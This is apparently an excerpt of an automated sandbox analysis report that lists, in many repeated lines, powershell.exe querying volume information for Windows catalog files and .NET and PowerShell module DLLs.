Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
